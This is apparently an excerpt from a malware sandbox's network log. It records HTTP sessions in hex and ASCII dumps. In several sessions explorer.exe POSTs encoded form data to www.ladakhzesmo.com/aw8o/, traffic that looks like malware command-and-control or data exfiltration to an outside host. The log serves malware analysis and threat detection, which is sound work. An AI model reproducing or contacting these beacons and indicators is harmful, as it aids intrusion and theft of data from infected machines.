                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 66 66 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e d0 9d d0 b5 20 d0 be d0 bf d1 83 d0 b1 d0 bb d0 b8 d0 ba d0 be d0 b2 d0 b0 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74
                                                                                                                                                                                          Data Ascii: ff2c<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> </title><link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&display=swap" rel="stylesheet"><script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script><script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } output.push(value); } ret
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637629986 CEST959INData Raw: 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d
                                                                                                                                                                                          Data Ascii: urn output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if ( (value & 0xF800) === 0xD800 ) {
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637691021 CEST960INData Raw: 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 6b 20 3d 20 30 3b 20 64 65 6c 74 61 20 3e 20 28 28 28 62 61 73 65 20 2d 20 74 6d 69 6e 29 20 2a 20 74 6d 61 78 29 20 3e 3e 20
                                                                                                                                                                                          Data Ascii: floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k + (base - tmin + 1) * delta / (delta + skew))
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637746096 CEST961INData Raw: 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 20 3d 20 64 65 63 6f 64 65 5f 64 69 67 69 74 28 69
                                                                                                                                                                                          Data Ascii: e_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_input(2)"); }
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637800932 CEST963INData Raw: 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 5b 69 5d 20 3d 20 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f
                                                                                                                                                                                          Data Ascii: if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output); }; this.encode = function (i
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637856960 CEST964INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6d 20 2d
                                                                                                                                                                                          Data Ascii: if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); } delta += (m - n) * (h + 1);
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637912035 CEST965INData Raw: 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 3d 30 3b 20 69 20 3c 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                          Data Ascii: n.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn--" + punycode.encode(s) :
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637969017 CEST967INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 32 39 35 45 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 77 72 61 70
                                                                                                                                                                                          Data Ascii: 10px; } a { color: #14295E; } .wrapper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex; flex: 1 0 auto;flex-direction: column;justify-content: spac
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638025999 CEST968INData Raw: 3a 20 23 38 39 39 34 41 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: : #8994AF; font-size: 10px; } .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap:
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638087034 CEST969INData Raw: 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 34 70 78
                                                                                                                                                                                          Data Ascii: .footer-links { padding: 14px 0; margin: 14px 0; border-top: 1px solid #F3F4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header>
                                                                                                                                                                                          Aug 10, 2023 10:20:12.683875084 CEST971INData Raw: 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 62 65 76 65 6c 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63
                                                                                                                                                                                          Data Ascii: troke-linejoin="bevel"/> <path opacity="0.1" fill-rule="evenodd" clip-rule="evenodd" d="M248.358 132.645L251.526 132.541L261.769 137.465L309.277 133.838L321.829 125.218L308.12 118.684L260.612 122.311L251.2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          27192.168.11.2049742119.18.54.5180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:18.124456882 CEST1028OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.ladakhzesmo.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.ladakhzesmo.com
                                                                                                                                                                                          Referer: http://www.ladakhzesmo.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 46 61 4b 46 50 67 75 51 54 33 78 35 43 31 4d 64 79 6d 4a 6a 2b 6c 48 2b 33 4e 4a 35 6e 4a 57 49 46 6e 61 68 50 2b 48 35 42 7a 66 70 51 55 59 49 48 51 52 47 52 32 36 4f 4b 4b 69 42 4e 56 5a 54 39 6e 50 38 52 7a 46 45 53 38 2f 77 46 4a 71 70 61 50 30 6f 59 74 45 43 5a 50 2b 31 6b 52 4a 41 6a 62 2f 77 76 75 69 55 6c 33 35 75 4f 6f 39 32 75 2f 69 64 6e 54 31 58 54 42 73 4a 37 39 63 61 76 4e 34 47 6d 68 61 48 4b 61 49 45 4c 68 51 48 65 34 4c 71 49 70 49 33 66 44 36 57 33 6b 36 2f 6e 61 4b 2f 6d 54 45 44 42 75 74 75 71 6d 49 57 51 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=EFaKFPguQT3x5C1MdymJj+lH+3NJ5nJWIFnahP+H5BzfpQUYIHQRGR26OKKiBNVZT9nP8RzFES8/wFJqpaP0oYtECZP+1kRJAjb/wvuiUl35uOo92u/idnT1XTBsJ79cavN4GmhaHKaIELhQHe4LqIpI3fD6W3k6/naK/mTEDButuqmIWQ==
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028390884 CEST1030INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:18 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                          Content-Length: 1221
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 52 5d 73 da 38 14 7d cf 4c ff 83 e2 99 ed c0 a4 d8 7c 24 4e 29 98 0e 5f 6e 42 80 00 31 04 78 c9 08 59 46 02 d9 56 24 19 43 32 f9 ef 6b c7 69 9a a6 ed ee be ac 1e 3c ba e7 5e 9f 7b 75 ee f9 70 04 92 53 3f ee 5c b7 9d c5 a8 0b 88 f2 19 18 4d 5b fd cb 36 d0 0a 86 71 5b 69 1b 46 c7 e9 80 f9 85 33 e8 83 92 5e 04 8e 80 81 a4 8a 86 01 64 86 d1 1d 6a 1f 9e 39 d2 a3 11 a5 f8 17 c3 88 e3 58 8f 2b 7a 28 d6 86 33 31 f6 29 69 29 65 79 b9 16 d4 1b 0a dd 55 ae d6 c8 38 ea cf ed 5d a8 60 01 ba 2b 16 a2 ed 16 1f 2c 6d 60 c7 71 67 bc e8 5d 85 cb 4b b2 43 c3 e6 b8 db 6a 8d 9b 9d 9b b8 19 df 34 7b ad e6 d5 fc fc 94 ee f9 c3 ec 30 5f f5 b8 40 7d 6f 75 71 ca e5 e8 f4 a4 5f c6 81 ba 17 b4 c8 1e 88 c9 b7 4d 38 ef 8f 2e 11 62 3b b3 33 6e e1 5e 6f f3 cd be 15 ad 4b db 1c 0f 0e 76 3c 77 ce da ed c9 61 73 53 e6 38 e8 b6 9b 71 b7 d9 1c 5b d6 dd 64 39 d9 97 ae 1e f6 d7 a5 cf 6d 56 6e 0e aa f3 fe 74 64 9e b0 73 b3 ba 1b 21 af e4 8d d5 a0 7b ee 05 db f9 7c 51 59 8b be e3 4c 27 9b 7b d8 f3 7a bc 62 e0 4b 39 99 fa 26 6a 8e fb a6 6b 9a 1d ef 7a 61 9c dc f2 b8 69 59 1a d8 fb 2c 90 d6 6f 74 2b 55 ab d5 4c ae 1f e2 60 e8 36 40 5d 22 41 b9 02 ea c0 b1 a5 29 bc 57 c6 06 ee 60 86 6a 8d 1d 14 00 ae 78 ad 6e 64 48 e3 9f eb 81 14 e8 b5 3d de 73 16 0a ec 09 8c 05 96 11 53 52 47 a1 6f f0 bd be 91 5f 11 b1 4a 5a e3 ff a0 2d ff 67 da 86 17 05 28 b5 0d 20 30 70 19 6e b6 46 1d ac 30 52 b9 fc a3 12 87 47 ea e5 8e 93 c7 e7 81 c0 2a 12 41 2d 15 83 fa 6b 16 ae 81 05 dc 10 45 7e e2 06 1d 09 0c 15 ee 32 9c 46 39 2d 29 d0 f2 b5 ac 4c 97 ea c0 b0 4e 30 5d 13 65 69 45 be d7 7e ce c4 d4 55 e4 5d e2 df 9f 2a b7 85 a4 32 99 4c 2a a8 22 a9 73 c2 bf 42 ab 5f 59 08 dc 9d 38 37 fe d2 1c 96 d8 14 75 dc de 75 97 10 dc 69 05 c3 8e 2d 6e ca 2e 87 8e 4d 9c ee 6c 36 78 98 44 78 ba 97 d8 19 24 8e 66 2d 77 7b d6 1f 4e 07 67 b0 db eb 8e e7 b6 3d 2e f6 36 e8 56 f1 95 d3 db 3a 9b e5 64 c5 26 a7 78 d6 5b 2e 2a 36 1d 96 ab f7 4b 36 34 97 dd 5e e7 c6 21 64 d5 ae 0e ae 8a 93 7b 58 19 46 ee c5 65 09 6e ab 70 18 cc 96 b3 87 e5 d9 ac cb 02 f7 76 68 af 6e 79 79 e1 ac 8b 57 a5 41 bc f0 a7 d6 c7 95 a5 9d a4 be 7a 55 71 15 ba 07 1d 72 8e 03 b7 4d 28 73 73 99 1c 89 92 5e 2e dd 5e e8 a5 3e c4 22 12 0c 1c 5b 16 d0 a2 c0 c5 1e 0d b0 ab 81 8f 1f 5f 73 c7 96 a6 e5 63 1a b8 61 ac ab 90 eb 2c 44 30 dd b0 f5 bd a0 f6 94 00 88 e4 b0 10 f9 c7 a7 a7 57 a7 7c 38 02 2f a7 ee 63 05 41 ba 81 02 be 8f e8 ce d2 da 61 a0 92 19 0b 4e 32 87 06 50 16 bd d8 89 28 9f d5 00 22 50 48 ac ac 48 79 85 cf 9a f1 0b 5b 00 fd c4 7f 3b 8a 63 1e 0a f5 86 23 33 80 8b 77 14 e1 c2 73 f0 09 d0 80 2a 0a 59 41 22 c8 b0 55 fa 04 22 89 c5 73 04 57 09 10 84 40 12 41 83 6d 41 85 05 8f aa 04 d0 de 36 64 49 0a 90 c4 35 99 8d 64 e2 23 2f 69 27 f5 75 18 ae 19 86 9c 66 2e 42 52 7e f5 a0 4f d9 c1 1a 85 9c d3 40 7e a9 14 8b 5a 62 76 66 69 cf f6 94 04 63 f5 13 b7 a2 8a e1 06 83 2e dc 92 07 2c fd 30 65 aa 1b 19 fc 7e 86 f7 44 2f 43 19 06 d5 91 1b 70 28 b6 cf 73 28 82 7d 2c 0d 81 d7 54 2a
                                                                                                                                                                                          Data Ascii: R]s8}L|$N)_nB1xYFV$C2ki<^{upS?\M[6q[iF3^dj9X+z(31)i)eyU8]`+,m`qg]KCj4{0_@}ouq_M8.b;3n^oKv<wasS8q[d9mVntds!{|QYL'{zbK9&jkzaiY,ot+UL`6@]"A)W`jxndH=sSRGo_JZ-g( 0pnF0RG*A-kE~2F9-)LN0]eiE~U]*2L*"sB_Y87uui-n.Ml6xDx$f-w{Ng=.6V:d&x[.*6K64^!d{XFenpvhnyyWAzUqrM(ss^.^>"[_sca,D0W|8/cAaN2P("PHHy[;c#3ws*YA"U"sW@AmA6dI5d#/i'uf.BR~O@~Zbvfic.,0e~D/Cp(s(},T*
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028495073 CEST1030INData Raw: 01 85 71 fa b9 5a 35 cf f5 64 3e 0d bc 95 32 bb d5 0d 82 a1 fb 02 d7 53 db bc dc df 7e eb d9 56 41 ea 9c 97 45 6d e0 0e 66 a8 d6 d8 41 01 50 ba 13 90 18 29 6b a7 d5 40 8a ca ad 58 13 c6 53 fc b0 bf 1c 4e ab 3b 48 1e 2a 17 f3 0d b9 9e 40 ba 8f f8
                                                                                                                                                                                          Data Ascii: qZ5d>2S~VAEmfAP)k@XSN;H*@goR{N{|=zMHsl&N8I.aU"5u*]vB$i}5`0XGpr)qx^.)p5`,hhw\B$?>t}ov,S77


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          28192.168.11.2049743119.18.54.5180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:20.776721954 CEST1032OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.ladakhzesmo.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.ladakhzesmo.com
                                                                                                                                                                                          Referer: http://www.ladakhzesmo.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 46 61 4b 46 50 67 75 51 54 33 78 34 69 6c 4d 65 52 2b 4a 6c 65 6c 49 37 33 4e 4a 7a 48 4a 61 49 46 72 61 68 4c 48 63 35 30 62 66 70 79 63 59 50 47 51 52 46 52 32 36 47 71 4c 6f 50 74 56 73 54 39 72 74 38 54 6e 46 45 57 55 2f 78 30 70 71 73 71 50 37 77 49 74 44 56 70 50 7a 78 6b 52 54 41 6a 58 4a 77 75 4b 69 55 31 4c 35 76 49 38 39 67 76 2f 68 57 6e 54 33 44 6a 42 6a 48 62 39 57 61 76 49 46 47 6e 6f 76 48 38 36 49 46 71 42 51 47 65 34 49 67 34 70 50 2f 2f 44 74 5a 55 39 31 36 58 71 70 2b 31 4f 39 62 67 44 71 75 70 37 55 4b 5a 54 47 53 67 65 47 61 75 78 72 2f 6a 5a 4d 66 70 5a 4e 64 75 48 32 55 61 68 39 55 6c 6e 7a 58 63 31 6c 47 63 4a 37 59 63 4d 4a 6b 6a 7a 71 2b 59 6e 4c 31 58 2b 4c 64 50 6b 53 62 6f 71 49 73 75 66 45 77 39 74 49 53 59 6b 32 72 6d 61 2b 77 56 6a 6c 45 31 4f 38 78 65 67 62 6d 68 59 2b 48 73 77 62 65 4c 63 47 36 41 35 48 53 30 57 69 7a 6c 4d 44 6b 51 66 35 67 6e 74 78 35 58 75 77 2b 30 69 6b 55 76 76 6e 50 53 75 37 30 4e 73 61 69 65 6d 41 75 37 39 42 48 39 55 66 2f 34 62 61 36 72 6e 6c 51 47 32 47 59 72 70 4d 30 6b 2b 7a 53 55 7a 72 78 47 4a 39 50 52 46 61 32 51 53 52 5a 6b 34 6a 33 49 79 6a 4d 79 38 39 4e 71 65 78 54 6b 75 62 44 33 64 79 30 50 50 4c 48 4a 69 77 49 58 47 43 50 5a 53 37 57 46 48 73 50 59 43 42 2b 6c 33 62 42 66 54 74 37 6b 2f 76 55 4a 67 4d 53 62 64 77 51 52 4b 66 66 73 44 63 74 2b 4f 67 4c 69 65 31 73 4a 63 79 36 44 32 39 47 75 6b 4a 50 74 75 68 6c 68 78 56 75 78 43 31 58 6b 6d 57 79 48 39 4f 33 6a 76 38 57 6e 35 57 4f 75 34 46 31 6a 47 58 34 71 30 43 44 53 57 67 6d 2f 6c 51 65 6f 5a 36 61 66 55 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=EFaKFPguQT3x4ilMeR+JlelI73NJzHJaIFrahLHc50bfpycYPGQRFR26GqLoPtVsT9rt8TnFEWU/x0pqsqP7wItDVpPzxkRTAjXJwuKiU1L5vI89gv/hWnT3DjBjHb9WavIFGnovH86IFqBQGe4Ig4pP//DtZU916Xqp+1O9bgDqup7UKZTGSgeGauxr/jZMfpZNduH2Uah9UlnzXc1lGcJ7YcMJkjzq+YnL1X+LdPkSboqIsufEw9tISYk2rma+wVjlE1O8xegbmhY+HswbeLcG6A5HS0WizlMDkQf5gntx5Xuw+0ikUvvnPSu70NsaiemAu79BH9Uf/4ba6rnlQG2GYrpM0k+zSUzrxGJ9PRFa2QSRZk4j3IyjMy89NqexTkubD3dy0PPLHJiwIXGCPZS7WFHsPYCB+l3bBfTt7k/vUJgMSbdwQRKffsDct+OgLie1sJcy6D29GukJPtuhlhxVuxC1XkmWyH9O3jv8Wn5WOu4F1jGX4q0CDSWgm/lQeoZ6afU=
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694406986 CEST1033INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:20 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                          Content-Length: 1223
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 52 5d 73 da 38 14 7d cf 4c ff 83 e2 99 ed c0 a4 d8 7c 85 94 82 e9 98 af 26 84 4f c7 10 c2 4b 46 c8 32 12 c8 b2 23 09 0c 64 f2 df d7 8e d3 34 4d db dd 7d 59 3d 78 74 cf bd 3e f7 ea dc f3 e1 04 c4 a7 7e da 1e b5 9c bb 71 07 10 e5 33 30 9e 36 fb 57 2d a0 e5 0c e3 b6 d4 32 8c b6 d3 06 f3 4b 67 d0 07 05 3d 0f 1c 01 b9 a4 8a 06 1c 32 c3 e8 0c b5 0f cf 1c c9 d1 88 52 e1 17 c3 88 a2 48 8f 4a 7a 20 56 86 63 1b fb 84 b4 90 b0 bc 5c 73 ea 0d 85 ee 2a 57 6b a4 1c f5 e7 f6 2e 54 30 07 dd 25 0b d0 66 83 0f a6 36 e8 46 51 7b 72 d7 bb 0e 16 57 64 87 86 d6 a4 d3 6c 4e ac f6 4d 64 45 37 56 af 69 5d cf 2f ca 74 1f 1e 67 87 f9 b2 17 0a d4 f7 96 97 e5 50 8e cb 67 fd 22 e6 ea 41 d0 3c 3b 92 4a b8 b1 e0 bc 3f be 42 88 ed 2a ed 49 13 f7 7a eb 6f dd 5b d1 bc ea 56 26 83 43 37 9a 3b e7 ad 96 7d 58 df 14 43 cc 3b 2d 2b ea 58 d6 c4 34 ef ed 85 bd 2f 5c 1f f7 a3 c2 e7 16 2b 5a 83 ea bc 3f 1d 57 ce d8 45 a5 ba 1b 23 af e0 4d d4 a0 73 e1 f1 cd 7c 7e 57 5a 89 be e3 4c ed f5 03 ec 79 bd b0 64 e0 2b 69 4f fd 0a b2 26 fd 8a 5b a9 b4 bd d1 9d 71 76 1b 46 96 69 6a 60 ef 33 2e cd df e8 56 a8 56 ab a9 5c 3f c4 c1 d0 6d 80 ba 44 82 86 0a a8 43 88 4d 4d e1 bd 32 d6 70 07 53 54 6b ec a0 00 70 19 d6 ea 46 8a 34 fe b9 1e 48 81 5e db e3 7d c8 02 81 3d 81 b1 c0 72 cb 94 d4 51 e0 1b e1 5e 5f cb af 88 98 05 ad f1 7f d0 16 ff 33 6d c3 db 72 94 d8 06 10 c8 5d 86 ad e6 b8 8d 15 46 2a 93 7d 54 e2 f0 48 bd cc 69 fc f8 2c 10 58 6d 05 af 25 62 50 7f c5 82 15 30 81 1b a0 ad 1f bb 41 47 02 43 85 3b 0c 27 51 46 8b 0b b4 6c 2d 2d d3 a5 3a 30 ac 13 4c 57 44 99 5a 3e dc 6b 3f 67 22 ea 2a f2 2e f1 ef 4f 95 9b 5c 5c 19 4f 26 15 54 5b a9 87 24 fc 0a 4d 67 36 2d dc 15 17 a5 e5 d4 5e 2c 6f aa 74 98 af 2e 96 05 d2 77 78 73 3d 58 5f e5 97 ce 70 e4 f0 d9 70 ea 17 ec 1b bf bb 73 fc 61 65 f1 